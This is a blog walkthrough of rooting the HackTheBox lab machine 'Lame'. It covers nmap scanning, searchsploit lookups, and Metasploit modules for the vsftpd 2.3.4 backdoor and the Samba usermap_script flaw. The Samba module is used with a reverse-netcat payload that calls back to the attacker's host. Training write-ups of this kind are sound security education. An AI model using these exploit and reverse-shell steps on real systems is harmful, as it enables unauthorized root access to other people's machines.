Lame HackTheBox Walkthrough

Lame HackTheBox WalkThrough

This is Lame HackTheBox Walkthrough. In this writeup, I have demonstrated how I rooted Lame HackTheBox Machine in very simple language. Before starting let us know something about this machine. It is a Linux machine with difficulty level low assigned by it’s maker and has been assigned IP address 10.10.10.3. This machine is retired so you will require VIP subscription to access this machine.

So first of all connect your PC with VPN and confirm the connectivity by pinging the IP address 10.10.10.3. If you are not able to ping lame machine after connecting to VPN make sure lame machine is running on the lab. Start the machine first, if it is not running then ping it again. If all correct then start hacking the machine.

I started by scanning the machine. For this purpose, a port scanner is used [we generally scan the machine so that we can banner grab the services running over it and this gives us an idea how to proceed further]. Nmap (a well-known port scanner) gave the following result.

Scanning

$ nmap -sC -sV -oN lame_scan 10.10.10.3

Lame HackTheBox default script nmap scan report during Walkthrough

Nmap scan revealed that ports 21, 22, 139 and 445 are open. FTP is running over port 21, SSH is running over 22 and SMB is running over ports 139 & 445. As soon as we get some open ports and services running over them, our next step should be to enumerate each services in depth so that we can get some useful information from them.

vsftpd 2.3.4 server is running over port 21. So lets us check if any exploit is present for this version. Used searchsploit tool to search available exploit for vsftpd service. Searchsploit gave the following result.

$ searchsploit vsftpd 2.3.4 #This will search available exploit over exploit-db.com

Searching vsftpd exploit using searchsploit

According to the result, vsftpd 2.3.4 service has a metasploit module which allows Backdoor Command Execution. So used metasploit tool to execute this exploit.

$ msfdb run # To start metasploit-framework along with database

msf5 > search vsftpd

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor

msf5 > set payload cmd/unix/interact

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Running vsftpd exploit remotely to get access in Lame Machine

Although vsFTPd 2.3.4 is vulnerable but no session created after exploit execution. This may be because it requires password or admin has blocked to run exploit over port 21. Left it here and moved forward for further enumeration. Nmap default script ftp-anon revealed that anonymous login is allowed. So tried to login anonymously using credential anonymous:anything. Logged in successfully. Then tried to list folder content but it appears that ftp folder is empty. Even couldn’t change the current directory.

$ ftp 10.10.10.3

~anonnymous

~anything

Anonymous Login and information gathering from Lame HackTheBox

Left it here and then moved to enumerate services on next port. Samba 3.0.20 is running on port 445 according to smb-os-discovery nmap script. So as usual, my next step is to search the public exploit for the given version 3.0.20. Searched using searchsploit for available exploits.

$searchsploit samba 3.0.20

Searching available Samba exploit through Searchsploit

According to the above result, a metasploit module named usermap_script is present. So used this exploit and successfully got command shell after exploitation.

msf5 > search usermap_script

msf5 > use exploit/multi/samba/usermap_script

msf5 > set payload cmd/unix/reverse_netcat

msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.5

msf5 exploit(multi/samba/usermap_script) > exploit

Exploiting Samba Service to get shell
during Lame HackTheBox walkthrough

We got a shell. However, the shell is not in form of shell prompt or fully qualified Linux shell. So upgraded the shell using python

Upgrading the Shell

$which python //To check whether python is installed on remote machine

$shell // To get a shell prompt

Upgrading shell to fully qualified linux shell

We have upgraded the shell. Now it is time to capture the flag.

Note: We can notice that we are root after getting shell, which means we have full permission to do anything. Moreover, our shell is root shell and we do not require privilege escalation any more.

Capture User Flag

$cat /home/makis/user.txt

Lame HackTheBox user flag captured during walkthrough

Capture Root Flag

$cat /root/root.txt

Lame HackTheBox root flag captured during walkthrough

This was how I rooted Lame HackTheBox machine. This was very simple box. Hope you guys have liked my methodology and have learnt some new things. Share your experience with us by commenting. And for any help & suggestion related to walkthrough feel free to write us at [email protected].

Liked this walkthrough check out our active machine writeups at https://ethicalhacs.com/. Next upcoming walkthrough is Legacy.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/